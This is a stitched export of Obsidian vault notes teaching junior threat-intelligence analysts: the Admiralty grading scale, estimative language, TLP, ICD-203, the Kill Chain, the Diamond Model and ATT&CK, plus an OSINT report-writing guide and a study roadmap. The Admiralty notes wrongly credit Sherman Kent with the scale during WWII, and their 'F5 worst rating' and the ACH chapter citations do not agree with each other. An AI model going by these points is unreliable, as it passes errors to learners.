tema-cti-fundamentos-doctrina ]]>projects/doctrina/osint-learning-resources.htmlProjects/doctrina/osint-learning-resources.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina ]]>projects/doctrina/entidad-admiralty-system.htmlProjects/doctrina/entidad-admiralty-system.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-sat-tecnicas-analisis-estructurado ]]>projects/doctrina/entidad-ach.htmlProjects/doctrina/entidad-ach.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina ]]>projects/doctrina/ciclo-de-inteligencia.htmlProjects/doctrina/ciclo-de-inteligencia.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-sat-tecnicas-analisis-estructurado ]]>projects/doctrina/entidad-devils-advocacy.htmlProjects/doctrina/entidad-devils-advocacy.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado. Seccion fuente: "C. Doctrina mínima viable". El master sigue intacto para lectura lineal. Important Estos 7 frameworks son los que no puedes no saber en tu primer mes. No te pido que los domines: te pido que sepas qué resuelve cada uno y dónde mirar la entidad en la vault para profundizar. Calificas fuente (A-F) y información (1-6) por separado. Permite que un titular Reuters cite a un tabloide y tú evalúes ambos.Ejemplos prácticos: Mandiant report sobre APT41 → A1 (vendor gold standard + datos forensics propios) Tweet de threat-hunter conocido pero sin enlace al artefacto → B3 Post anónimo en BreachForums anunciando leak → F6 (hasta validar muestra) Profundiza: [[entidad-admiralty-system]] Inventado por Sherman Kent en 1964 después de que Bahía de Cochinos saliera mal porque "very serious possibility" significaba 11% para uno y 65% para otro. Hoy es estándar ICD-203.Regla crítica para el junior NUNCA mezcles likelihood y confidence en la misma frase. Mal: "It is very likely the actor is APT28 with low confidence". Bien: "It is very likely [80-95%] the actor is APT28. Confidence is moderate because attribution rests on infrastructure overlap with two priors, no malware sample matches yet." Profundiza: [[entidad-wep]]. Equivalente UK: [[entidad-phia-yardstick]]. Quién puede leer tu reporte. Va arriba del documento, siempre.Default conservador Si dudas entre AMBER y GREEN, etiqueta AMBER. Bajar el TLP siempre se puede; subirlo después de divulgación es imposible. Profundiza: [[entidad-tlp-v2]]. Mantenido por [[entidad-first-org]]. Directiva del ODNI estadounidense. Aplican a cualquier producto analítico decente, no sólo IC clásica. Describe calidad y credibilidad de fuentes y metodología Expresa incertidumbres con WEP estándar Distingue información objetiva de juicios analíticos Incorpora análisis de alternativas (ACH) Demuestra relevancia para el cliente y sus implicaciones Argumentación clara y lógica Explica cambios o consistencia respecto a juicios previos Produce juicios precisos Información visual efectiva cuando aporta Para el junior Los más importantes para empezar son los 1, 2 y 3. Si tu reporte cumple esos tres, ya estás por encima del 70% de los reportes mediocres del mercado. Profundiza: [[entidad-icd-203]] Mapa lineal de un ciberataque. Lo usas para situar dónde está la actividad observada. Reconnaissance — el adversario investiga al objetivo Weaponization — prepara el payload (exploit + RAT/backdoor) Delivery — entrega el payload (phishing, USB, watering hole) Exploitation — explota la vulnerabilidad Installation — instala persistencia C2 — establece canal de mando y control Actions on Objectives — exfiltra, cifra, destruye Profundiza: [[entidad-cyber-kill-chain]]. Versión extendida 18 fases: [[entidad-unified-kill-chain]]. Complementa CKC. Ves un evento de intrusión como un diamante con cuatro vértices: Adversary ↔ Capability ↔ Infrastructure ↔ Victim. Permite razonar relaciones, no sólo secuencia.Tip Cuando tengas un IOC, intenta ubicarlo en uno de los vértices: una IP es Infrastructure, un implant es Capability, una empresa atacada es Victim, un grupo nombrado es Adversary. Si conectas dos vértices, ya tienes una hipótesis de campaña. Profundiza: [[entidad-diamond-model]] Catálogo público de tácticas (objetivos) y técnicas (cómo se logran). El junior mapea TTPs vistos a IDs ATT&CK (T1059.001, T1486, etc.) para que cualquier otro analista del mundo entienda al instante. Tactics = qué quería el adversario en cada paso (Initial Access, Execution, Persistence, ...) Techniques = cómo lo hizo (PowerShell, Scheduled Task, ...) Sub-techniques = la variante exacta Operacionalízalo con MITRE ATT&CK Navigator — capa JSON visualizable en https://mitre-attack.github.io/attack-navigator/. Te permite pintar el "heatmap" de un actor y compararlo con la cobertura de tus detecciones. Profundiza: [[entidad-mitre-attack]] + [[entidad-mitre-attack-navigator]]. Mantenido por [[entidad-mitre-corporation]]. Trío canónico CTI moderno CKC + Diamond + ATT&CK se usan juntos: CKC dice en qué fase, Diamond dice qué entidades, ATT&CK dice qué técnica concreta. Cualquier reporte sólido los referencia los tres. Importado desde Inbox/Assessment of Information.md durante consolidacion bulk. The Admiralty Scale, established by Sherman Kent during World War II for the CIA's intelligence analysis methods, provides a standardized framework for assessing information based on two independent dimensions: source reliability (A through F) and content credibility (1 through 6). This dual assessment is fundamental for correctly interpreting intelligence depending on the source.The Admiralty Scale (also known as the NATO System or Sherman Kent Scale) is a two-axis evaluation framework: Source Reliability (A-F): Assesses the trustworthiness of the information source Content Credibility (1-6): Assesses the accuracy and verifiability of the information itself The best possible rating is A1 (completely reliable source, confirmed by independent sources). The worst is F5 (unknown reliability, improbable information).Sherman Kent helped establish the CIA's intelligence analysis methods during World War II. This model became the standard for assessing information across military and civilian intelligence communities. It is fundamental because it requires interpreting information correctly depending on the source. Every intelligence product should include an Admiralty rating Source reliability and content credibility are assessed independently A1 = best case (reliable source + confirmed information) F5 = worst case (unknown source + improbable information) The assessment informs decision-making confidence levels
English version companion to doctrina-minima-viable (Spanish version) Applied across all intelligence-typed notes in this vault (reliability/credibility fields) Foundation for the Admiralty Scale tags in the vault taxonomy Sherman Kent, CIA intelligence analysis methodology (WWII era) NATO Information Grading System Importado desde Inbox/Valoración de la información.md durante consolidacion bulk. La Escala Admiralty de Sherman Kent es el estandar de valoracion de informacion en inteligencia. Evalua dos dimensiones independientes: fiabilidad de la fuente (A a F) y credibilidad del contenido (1 a 6). Establecida durante la Segunda Guerra Mundial para los metodos de analisis de la CIA, sigue siendo la referencia fundamental para interpretar correctamente la informacion segun su origen.La Escala Admiralty (tambien conocida como Sistema NATO o Escala Sherman Kent) es un framework de evaluacion de dos ejes: Fiabilidad de la fuente (A-F): Evalua la confiabilidad del emisor de la informacion Credibilidad del contenido (1-6): Evalua la precision y verificabilidad de la informacion misma La mejor valoracion posible es A1 (fuente completamente fiable, confirmada por fuentes independientes). La peor es F5 (fiabilidad desconocida, informacion improbable).Sherman Kent ayudo a establecer los metodos de analisis de inteligencia de la CIA en plena Segunda Guerra Mundial. Este modelo se convirtio en el estandar para valorar informacion en comunidades de inteligencia militares y civiles. La valoracion es fundamental ya que es necesario interpretar la informacion de manera correcta dependiendo de quien es la fuente. Toda produccion de inteligencia debe incluir una valoracion Admiralty Fiabilidad de la fuente y credibilidad del contenido se evaluan de forma independiente A1 = mejor caso (fuente fiable + informacion confirmada) F5 = peor caso (fuente desconocida + informacion improbable) La valoracion informa el nivel de confianza en la toma de decisiones
Version en español, complementaria a doctrina-minima-viable (version en ingles) Aplicada a todas las notas de tipo inteligencia del vault (campos reliability/credibility) Fundamento de los tags de Escala Admiralty en la taxonomia del vault Sherman Kent, metodologia de analisis de inteligencia de la CIA (WWII) Sistema de Clasificacion de Informacion NATO
tema-cti-fundamentos-doctrina ]]>projects/doctrina/doctrina-minima-viable.htmlProjects/doctrina/doctrina-minima-viable.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado. Seccion fuente: "E. Fuentes A1 / vendors gold standard". El master sigue intacto para lectura lineal. Info Cuando dices "según fuente A1" en un reporte, esperas que el lector senior reconozca el nombre. Aquí los 8 que un L1 debe conocer y consultar antes que cualquier otro. Otros que aparecen frecuente y son sólidos (B1-A1 según pieza): Sophos Labs (ransomware, MDR data) SentinelOne (S1 Labs) (malware analysis ágil) Trend Micro Research (IoT, ICS, OT threats) Symantec/Broadcom Threat Hunter Team (telemetría histórica enorme) Group-IB (Eastern Europe/Asia, fraude financiero) Bitdefender Labs (mass-malware + IoT) Check Point Research (phishing, mobile) Trellix Advanced Research Center (APT, ICS) Securelist (Kaspersky) y AhnLab ASEC (Asia) Sobre atribución Incluso fuentes A1 fallan en atribución. Cita atribuciones de A1 con WEP likely [55-80%] y MODERATE confidence salvo que tengas convergencia de 3+ vendors A1 → entonces puedes subir a very likely [80-95%] con HIGH confidence. Nunca como junior pongas almost certainly [95-99%] en una atribución. Feeds gratuitos sólidos (no A1 pero útiles a diario): abuse.ch (URLhaus, MalwareBazaar, ThreatFox, Feodo Tracker) — B2-A2 AlienVault OTX (pulses) — variable C3-B2 según autor CISA KEV catalog — A1 para "explotada in the wild" EPSS (FIRST.org) — A1 para probabilidad de explotación NVD (NIST) — A1 para CVE oficial Sigma HQ + YARA-Rules repos — B2-A2 (muchos contribuidores reputados) @malware_traffic_analysis (Brad Duncan) — B1 @vxunderground — B2 (archivos de muestras + leaks de operadores)
tema-cti-fundamentos-doctrina ]]>projects/doctrina/fuentes-a1-vendors-gold-standard.htmlProjects/doctrina/fuentes-a1-vendors-gold-standard.mdTue, 28 Apr 2026 14:29:12 GMTtema-cti-fundamentos-doctrina
tema-report-writing-cti ]]>projects/doctrina/guia-escritura-inteligencia.htmlProjects/doctrina/guia-escritura-inteligencia.mdTue, 28 Apr 2026 14:29:12 GMThttps://www.dni.gov/files/documents/ICD/ICD%20203%20Analytic%20Standards.pdf
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina ]]>projects/doctrina/entidad-icd-203.htmlProjects/doctrina/entidad-icd-203.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-sat-tecnicas-analisis-estructurado ]]>projects/doctrina/entidad-indicators-signposts.htmlProjects/doctrina/entidad-indicators-signposts.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-sat-tecnicas-analisis-estructurado ]]>projects/doctrina/entidad-key-assumptions-check.htmlProjects/doctrina/entidad-key-assumptions-check.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-sat-tecnicas-analisis-estructurado ]]>projects/doctrina/entidad-mom-pop-moses-eve.htmlProjects/doctrina/entidad-mom-pop-moses-eve.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-sat-tecnicas-analisis-estructurado ]]>projects/doctrina/entidad-multiple-hypothesis-generation.htmlProjects/doctrina/entidad-multiple-hypothesis-generation.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-figuras-doctrinales-ic ]]>projects/doctrina/entidad-odni.htmlProjects/doctrina/entidad-odni.mdTue, 28 Apr 2026 14:29:12 GMTOSINT Report Writing is a critical skill
Before we dive into the mechanics of report writing, we need to address the mindset behind effective OSINT analysis. OSINT is a state of mind, not just a collection of techniques or tools. Most true 'OSINTians' understand that the real value comes not from what you find but from how you interpret it.I've often told my students and clients that tools are only as useful as your understanding of how to use them. This applies tenfold to analysis. The most sophisticated data collection is worthless without proper analytical frameworks to make sense of it.Analysis isn't just summarising what you've found. It's about identifying patterns, making connections between seemingly unrelated pieces of information, and understanding the significance of those connections. When writing an intelligence report, you're not just documenting facts, you're telling a story backed by evidence.This narrative should guide the reader through your thinking process, showing how you arrived at your conclusions and why those conclusions matter. Remember that questions you couldn't answer are sometimes as important as the ones you could. Being transparent about limitations and gaps in your knowledge demonstrates intellectual honesty and helps decision-makers understand the bounds of certainty within which they're operating.
The analytical process in OSINT investigations should be systematic and deliberately structured to minimise cognitive biases. We all have biases, the key is recognising them and implementing methodologies that help mitigate their impact. Analytical techniques like Alternative Competing Hypotheses, Analysis of Competing Hypotheses, and structured analytic techniques aren't just academic exercises, they're practical tools that help ensure the integrity of your conclusions.When writing your report, make it clear which analytical framework you employed and how it shaped your interpretation of the evidence. This transparency not only strengthens your credibility but also educates your audience about the structured process behind your work.Every effective OSINT report begins with clear objectives and a well-defined scope.Before diving into your investigation or writing a single word of your report, ask yourself: What exactly am I trying to learn? Who will read this report, and what decisions will they make based on it? How much detail is appropriate for this audience? These questions might seem basic, but I've seen countless reports fail simply because the analyst didn't take the time to clarify these foundational elements.A report that doesn't address the specific needs of its audience is unlikely to have the desired impact, no matter how technically sound the analysis.Understanding your audience is crucial for effective communication.A report for technical cybersecurity specialists will differ dramatically from one intended for executive decision-makers or legal professionals. Technical audiences typically appreciate detailed methodologies and in-depth analysis of evidence, while executives focus on business implications and actionable recommendations. Legal professionals may need specific types of documentation and rigorous source verification.Tailor your language, technical depth, and structure to match your audience's expertise and information needs. I've found that asking stakeholders directly about their expectations can save enormous time and frustration down the line.Defining the scope of your investigation helps manage expectations. Be specific about geographical boundaries, time frames, and subjects of interest. Acknowledge inherent limitations in your methodology to maintain credibility.For example, you might state that your analysis covers social media activity only from the past six months or that certain proprietary databases were inaccessible. This transparency builds trust with your readers and helps them appropriately contextualise your findings. In my experience, it's better to deliver a focused, thorough analysis of a well-defined area than a superficial overview of a broader topic.A well-structured OSINT report guides readers through your findings in a logical progression, making complex information digestible and actionable. After years of writing and reading countless reports, I've found that certain structural elements consistently contribute to clarity and impact. The structure I'm about to describe isn't rigid, adapt it to your specific circumstances, but it provides a proven framework that ensures you cover all essential bases.The report should begin with a title page containing a clear, descriptive title, your organisation's name, date, classification level (if applicable), and any case reference numbers.
This is followed by a Bottom Line Up Front (BLUF) statement or executive summary that presents key findings concisely. The BLUF approach comes from military intelligence and puts the most critical information right at the beginning.This is especially important because many decision-makers won't read your entire report, they'll rely on this summary to decide whether to dig deeper.Make it count by focusing on actionable insights rather than just describing what you did.The introduction should define your objectives, scope, and research questions, explaining why this investigation matters and what value it aims to deliver.The methodology section is where you detail your approach, tools used, and data sources. This transparency builds credibility and allows others to evaluate the rigor of your work.The main body presents your findings, organized either chronologically or thematically depending on what makes most sense for your investigation. I typically prefer a thematic organisation for complex cases, grouping related findings together regardless of when they were discovered. This approach makes it easier for readers to grasp the big picture.The analysis section is where you interpret these findings, highlight patterns and anomalies, and explain their significance. This is your opportunity to demonstrate critical thinking and add value beyond mere information collection.Finally, the conclusion summarises key points and provides recommendations for action. These recommendations should flow logically from your analysis and be specific, actionable, and prioritised.Thorough documentation of sources and methods is essential for credibility and reproducibility.In OSINT, where information comes from diverse public sources of varying reliability, this becomes even more critical. I always recommend creating a systematic approach to evaluating sources, considering factors like reliability, potential bias, source independence, and verification from multiple sources. This methodical source evaluation demonstrates the rigor behind your findings and builds confidence in your conclusions.When documenting your methodology, be specific about which tools and techniques you employed and how you used them. Simply listing tools provides little value.
Explain how each tool contributed to your investigation. For example, instead of stating "Used ShadowDragon," explain: "I employed ShadowDragon Horizon to map relationships between key entities, focusing on financial transactions between Company X and its suppliers over the past three years."This level of detail helps readers understand your approach and evaluate the thoroughness of your investigation. I've found that including screenshots or flowcharts of your investigation process can be particularly helpful for complex methodologies.Cross-referencing information across multiple sources is a cornerstone of OSINT practice. In your report, explain your process for verifying information and resolving conflicting data points.Describe how you assessed contradictory information and the criteria you used to determine which sources were most reliable. This transparency about your verification process strengthens your credibility and demonstrates professional integrity.I always tell my students that in OSINT, a single source is interesting, two sources are promising, but three or more independent sources confirming the same information is when you can start to feel confident in your findings. Make this verification process explicit in your methodology section.The analysis section transforms raw data into meaningful intelligence through the application of analytical frameworks and techniques. This is where you move beyond description to explanation and implication, answering not just what happened but why it matters.
Explain which analytical frameworks you applied to interpret your findings. These might include structured analytical techniques like Analysis of Competing Hypotheses, link analysis for understanding relationships, sentiment analysis for evaluating opinions, or trend analysis for identifying patterns over time.When writing this section, focus on revealing connections that might not be immediately obvious and explaining their significance.For example, rather than simply noting increased social media activity around a topic, analyse what that activity suggests about public sentiment or potential future developments. Look for anomalies and unexpected findings, these often yield the most valuable insights.I've found that the best analysis often emerges from asking "Why?" repeatedly. Why did this person behave in this way? Why now? Why using these particular methods? These questions can lead to deeper understanding that goes beyond surface-level observations.Visual representations significantly enhance understanding of complex data and relationships. Network graphs, timelines, heat maps, and other visualisations can reveal patterns that might be invisible in textual descriptions. When including visualisations, ensure they serve a clear purpose rather than merely decorating the report.Each visual element should advance understanding of key findings and be accompanied by explanations of what it reveals and why it matters.I often use timeline visualisations to show the progression of events, network graphs to illustrate relationships between entities, and geographic mapping to highlight spatial patterns. These visual tools have repeatedly proven their value in helping stakeholders grasp complex patterns quickly.The way you communicate your findings has a tremendous impact on how they're received and whether they lead to action. Begin your report with a concise summary of key findings in a BLUF (Bottom Line Up Front) statement.An effective BLUF might read: "Based on our investigation, we assess with high confidence that Company X has significant undisclosed business relationships in sanctioned countries, creating both legal and reputational risks that require immediate attention." This immediately gives decision-makers the most critical information, even if they read nothing else.Adapt your language and technical detail to your audience's expertise level. For technical audiences, include detailed methodologies and in-depth analysis. For executive audiences, focus on business implications and actionable recommendations.
tailor language to the according audienceRegardless of audience, maintain clarity and precision in your writing. Define specialised terms when first used, avoid unnecessary jargon, and ensure that technical concepts are explained in accessible language without sacrificing accuracy.I've seen too many excellent analyses fail to gain traction simply because they weren't communicated in a way that resonated with their intended audience. Establish consistent citation practices throughout your report to enhance transparency and allow readers to verify information independently.Document not only the sources themselves but also when they were accessed, as online content can change or disappear. Maintain metadata about your sources to ensure that original materials can be referenced if questions arise.This documentation becomes particularly important if findings might be used in legal or regulatory contexts.I always tell my students: if you can't trace a piece of information back to its source, you shouldn't include it in your report.Now let's look at a practical template for structuring your OSINT reports. This template incorporates the best practices we've discussed and can be adapted to various investigation types. I've used variations of this template throughout my career, refining it based on feedback and experience. Feel free to modify it to suit your specific needs, but ensure you maintain the core elements that contribute to clarity, credibility, and impact.OSINT Intelligence Report TemplateINTELLIGENCE REPORTTitle: [Clear, Descriptive Title]Prepared by: [Your Name/Organization]Date: [Preparation Date]Classification: [Classification Level if Applicable]Case Reference: [Reference Number if Applicable]BOTTOM LINE UP FRONT[1-2 paragraphs summarising key findings, assessments, and recommendations. Focus on what decision-makers need to know immediately.] INTRODUCTION 1.1 Purpose [Brief explanation of why this report was created and what questions it aims to answer] 1.2 Scope [Define boundaries of the investigation: time period, geographical focus, subjects covered] 1.3 Background [Essential context needed to understand the findings] METHODOLOGY 2.1 Data Collection Approach [Description of how information was gathered, including tools and techniques used] 2.2 Source Evaluation [Explanation of how sources were assessed for reliability and credibility] 2.3 Analytical Methods [Description of frameworks and techniques used to analyze the data] 2.4 Limitations [Transparent acknowledgment of constraints and gaps in the investigation] FINDINGS 3.1 [Theme/Area 1] [Detailed presentation of facts discovered during investigation] 3.2 [Theme/Area 2] [Presentation of additional findings organized by theme] 3.3 [Additional Themes as Needed] [Continue organising findings into logical groupings] ANALYSIS 4.1 [Key Insight 1] [Interpretation of findings, patterns identified, and their significance] 4.2 [Key Insight 2] [Further analysis of patterns, anomalies, or connections discovered] 4.3 [Additional Insights as Needed] [Continue presenting analytical insights] TIMELINE [Chronological presentation of significant events if relevant to the investigation] ENTITIES OF INTEREST 6.1 [Person/Organisation 1] [Profile including key attributes, relationships, and relevance to investigation] 6.2 [Person/Organisation 2] [Additional profiles as needed] ASSESSMENT 7.1 Key Judgments [Summary of most important analytical conclusions] 7.2 Confidence Levels [Explanation of how certain you are about each key judgment and why] 7.3 Alternative Explanations [Discussion of other plausible interpretations of the evidence] RECOMMENDATIONS [Specific, actionable steps based on the analysis, prioritized by importance/urgency] APPENDICES 9.1 Technical Details [In-depth technical information for specialist readers] 9.2 Source Documentation [Detailed information about sources for verification purposes] 9.3 Visualisations [Additional charts, graphs, network maps, or other visual elements] This template provides a structured framework for communicating your findings effectively. The key is not to view it as a rigid format but as a flexible guide that ensures you cover all essential elements. I've found that starting with a template like this saves time and ensures consistency across reports, while still allowing for customisation based on the specific investigation and audience.OSINT reporting is both an art and a science, requiring continuous learning and refinement. As you develop your skills, focus on integrating new technologies and methodologies while maintaining rigorous analytical standards. The field evolves rapidly, with new data sources, tools, and analytical frameworks emerging constantly. Stay connected with the OSINT community through blogs, forums, and conferences to keep your skills current. I've learned some of my most valuable techniques from practitioners in completely different domains who approach problems from fresh perspectives.
Artificial intelligence and machine learning have transformed what's possible in OSINT analysis. Modern reports increasingly incorporate AI tools to enhance data collection, processing, and visualisation. But there is also a lot of risk when it comes to embedding AI in your work or reports.When using these tools, document their specific applications and limitations to maintain transparency. For example, AI can be incredibly powerful for analysing large text datasets or identifying patterns in visual media, but it comes with its own biases and limitations that must be acknowledged in your methodology.I've found that combining traditional analytical techniques with AI-enhanced tools provides the best results. Leveraging the strengths of both approaches while mitigating their respective weaknesses.Ethical considerations should inform every aspect of your OSINT work. Always respect privacy laws and ensure your work adheres to legal and ethical standards. Document the ethical framework guiding your investigation, addressing considerations such as privacy, potential harm, and proportionality of methods to objectives.Legal considerations vary by jurisdiction but typically include privacy laws, copyright restrictions, and regulatory compliance. When reporting findings that might have legal implications, consider consulting with legal counsel before finalising your report. Throughout my career, I've found that maintaining high ethical standards not only keeps you on the right side of the law but also builds trust with clients and stakeholders, ultimately enhancing your effectiveness as an intelligence professional.Remember that the most valuable OSINT reports aren't merely collections of information but carefully constructed narratives that guide readers from questions to insights to actions.By mastering this discipline, you become not just an information gatherer but a trusted intelligence professional whose analysis drives informed decision-making. The OSINT landscape is filled with information but starved for insight, these skills are more valuable than ever. They can help organizations navigate complex threats, identify emerging opportunities, and make better decisions in uncertain times.
tema-cti-fundamentos-doctrina
tema-report-writing-cti ]]>projects/doctrina/osint-analysis-intelligence-report-writing.htmlProjects/doctrina/osint-analysis-intelligence-report-writing.mdTue, 28 Apr 2026 14:29:12 GMT<figure><img src="https://static.wixstatic.com/media/038b0b_73d957df68184ba4a6d8b9e7adb62b1e~mv2.png/v1/fill/w_740,h_1110,al_c,q_90,usm_0.66_1.00_0.01,enc_avif,quality_auto/038b0b_73d957df68184ba4a6d8b9e7adb62b1e~mv2.png"></figure>osint-mastery-guide — secciones de contenido (descartado meta-repo: Acknowledgments, License, Contact, Support). Before diving into OSINT investigations, ensure you have: 📚 Foundational Knowledge: Basic understanding of internet protocols, databases, and search techniques ⚖️ Legal Awareness: Familiarity with local privacy laws and ethical investigation practices 🔐 Security Setup: Secure investigation environment with VPN, encrypted communications 🛠️ Essential Tools: Modern web browser, note-taking application, screenshot capabilities 📖 Read the Book: Start with "A Complete Guide to Mastering OSINT" for comprehensive foundation 📋 Choose Your Template: Select appropriate templates from /osint-templates/ based on investigation type 🔧 Setup Tools: Install and configure tools from /osint-tools/ relevant to your objectives 📝 Plan Your Investigation: Use planning templates to structure your approach 🔍 Begin Investigation: Follow systematic methodology with proper documentation 📊 Analyze and Report: Use analysis templates to present findings professionally Comprehensive guides for OSINT beginners: 📖 OSINT Fundamentals: Core concepts, terminology, and principles 🛠️ Tool Installation Guides: Step-by-step setup instructions ⚖️ Legal and Ethical Guidelines: Compliance frameworks and best practices 🎯 First Investigation Tutorial: Hands-on learning with practical examples Expert-level methodologies and specialized approaches: 🕵️ Advanced Investigation Strategies: Complex case methodologies 🤖 AI Integration Techniques: Leveraging artificial intelligence in investigations 🔐 Advanced Privacy Protection: Sophisticated operational security measures 📊 Big Data Analysis: Handling large-scale information processing Real-world applications and lessons learned: 🏢 Corporate Intelligence Cases: Business investigation examples 🕵️ Personal Investigation Studies: Individual research case studies 🚨 Security Incident Analysis: Breach investigation examples 📺 Media and Journalism Cases: Fact-checking and verification examples Q1 2025 🆕 Advanced AI integration templates 🔧 Mobile investigation tool expansion 📱 Mobile app for field investigations 🎓 Online certification program launch Q2 2025 🌐 Multi-language template translations 🤖 Automated report generation tools 📊 Advanced data visualization templates 🔗 API integration frameworks Q3 2025 🏛️ Government compliance templates 🔒 Enhanced privacy protection tools 📈 Machine learning analysis templates 🌍 Global law enforcement collaboration Q4 2025 🎯 Specialized industry templates 🔍 Advanced threat hunting frameworks 📚 Second edition book integration 🌟 Community contribution platform 🤖 Artificial Intelligence: Advanced AI integration for automated analysis 🌐 Global Expansion: International templates and compliance frameworks 📱 Mobile Technology: Mobile-first investigation platforms and tools 🔒 Privacy Technology: Advanced privacy protection and anonymization tools 📊 Data Science: Big data analysis and machine learning integration Last Updated: [Current Date] Repository Version: 2.0.0 Maintained by: Jamba Academy OSINT Team "In the age of information, OSINT is not just a skill—it's a superpower. This repository empowers you to harness that power responsibly and effectively." — Jamba Academy
tema-cti-fundamentos-doctrina
tema-osint-references-master-deep-dive ]]>projects/doctrina/osint-mastery-learning.htmlProjects/doctrina/osint-mastery-learning.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina ]]>projects/doctrina/entidad-phia-yardstick.htmlProjects/doctrina/entidad-phia-yardstick.mdTue, 28 Apr 2026 14:29:12 GMThttps://www.cia.gov/resources/csi/books-monographs/psychology-of-intelligence-analysis-2/ Capitulos clave: 7 (cognitive biases in evaluating evidence), 8 (biases in perception), 12 (Analysis of Competing Hypotheses)
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-sat-tecnicas-analisis-estructurado ]]>projects/doctrina/entidad-psychology-intelligence-analysis.htmlProjects/doctrina/entidad-psychology-intelligence-analysis.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-sat-tecnicas-analisis-estructurado ]]>projects/doctrina/entidad-quality-of-information-check.htmlProjects/doctrina/entidad-quality-of-information-check.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-figuras-doctrinales-ic ]]>projects/doctrina/entidad-randolph-pherson.htmlProjects/doctrina/entidad-randolph-pherson.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-figuras-doctrinales-ic ]]>projects/doctrina/entidad-richards-heuer.htmlProjects/doctrina/entidad-richards-heuer.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado. Seccion fuente: "I. Roadmap 90 días junior CTI/CTH". El master sigue intacto para lectura lineal. Tip Plan progresivo. Si te sientes ahogado en la semana 1, no pasa nada — el primer mes es turbulento por diseño. Si en el día 60 aún no entiendes ATT&CK, pide refuerzo: no es vergüenza, es eficiencia. Lee §B (glosario) entero y haz tu propia tabla con dudas pendientes Lee §C (doctrina mínima viable) tres veces; abre las entidades vault de cada framework Lee Visser2026_cti-fundamentos-lecciones + Doe2024_cti-theory-vs-experience Crea cuenta en VirusTotal, AlienVault OTX, AbuseIPDB, GreyNoise Free, Censys Free, Shodan (free trial) Configura tu OpenCTI/MISP de prácticas (puedes correr https://demo.opencti.io/ o spin-up local con Docker) Lee 5 reports A1 enteros (Mandiant + Microsoft + Unit 42 + Talos + CrowdStrike) — observa estructura y rigor Aprende a navegar MITRE ATT&CK Navigator y ATT&CK groups page (cubre 5 actores) Lee PAI2026_guia-obsidian-vault-cti-l1 para entender la vault si vas a usar Obsidian/PAI Triaje de alertas SIEM (workflow §D.1) — al menos 50 alertas, todas peer-reviewed Enrichment de IOCs (workflow §D.2) — 100+ IOCs cruzados en 4+ fuentes Escribe tu primer reporte §4.6 (CVE crítico) sobre una CVE real del mes — peer-review obligatorio Escribe tu primer reporte §4.4 (campaña ransom/malware) basado en un report A1 reciente Hunt con 3 reglas Sigma públicas convertidas a tu SIEM (workflow §D.5) Domina [[entidad-mitre-attack]] + [[entidad-cyber-kill-chain]] + [[entidad-diamond-model]] — sé capaz de explicar la diferencia entre los tres en una pizarra Lee 3 IRM CERT-SG completos (recomendados: [[certsg-irm-13-customer-phishing]], [[certsg-irm-17-ransomware]], [[certsg-irm-11-information-leakage]]) Elige UNA vertical para profundizar primero: ransomware, threat actor profiling, OSINT/HUMINT, CTH/Sigma+YARA, dataleaks/dark web Empieza un perfil de threat actor relevante para el sector del cliente (workflow §D.3, plantilla §4.5) Aporta una regla Sigma original al repo del SOC + corresponding hunt Resuelve 5 retos de OSINT CTF Newsletter (https://ctf.osintnewsletter.com/challenges) Lee [[entidad-psychology-intelligence-analysis]] (Heuer) — el fundacional, especialmente capítulo 8 ACH Aprende a aplicar ACH ([[entidad-ach]]) en una investigación real con 3+ hipótesis Si vas a CTH puro: domina Sigma, YARA, KQL/SPL/ES|QL del SIEM del cliente Pide a tu lead un objetivo de progresión a L2 con criterios concretos Lectura constante (todo el primer año) Daily: Talos blog, Microsoft Security blog, CISA alerts, BleepingComputer Weekly: SANS NewsBites, Risky Business podcast, tldr.sec Monthly: Mandiant M-Trends summary, Recorded Future Insikt selected Yearly: Verizon DBIR, Microsoft Digital Defense Report, 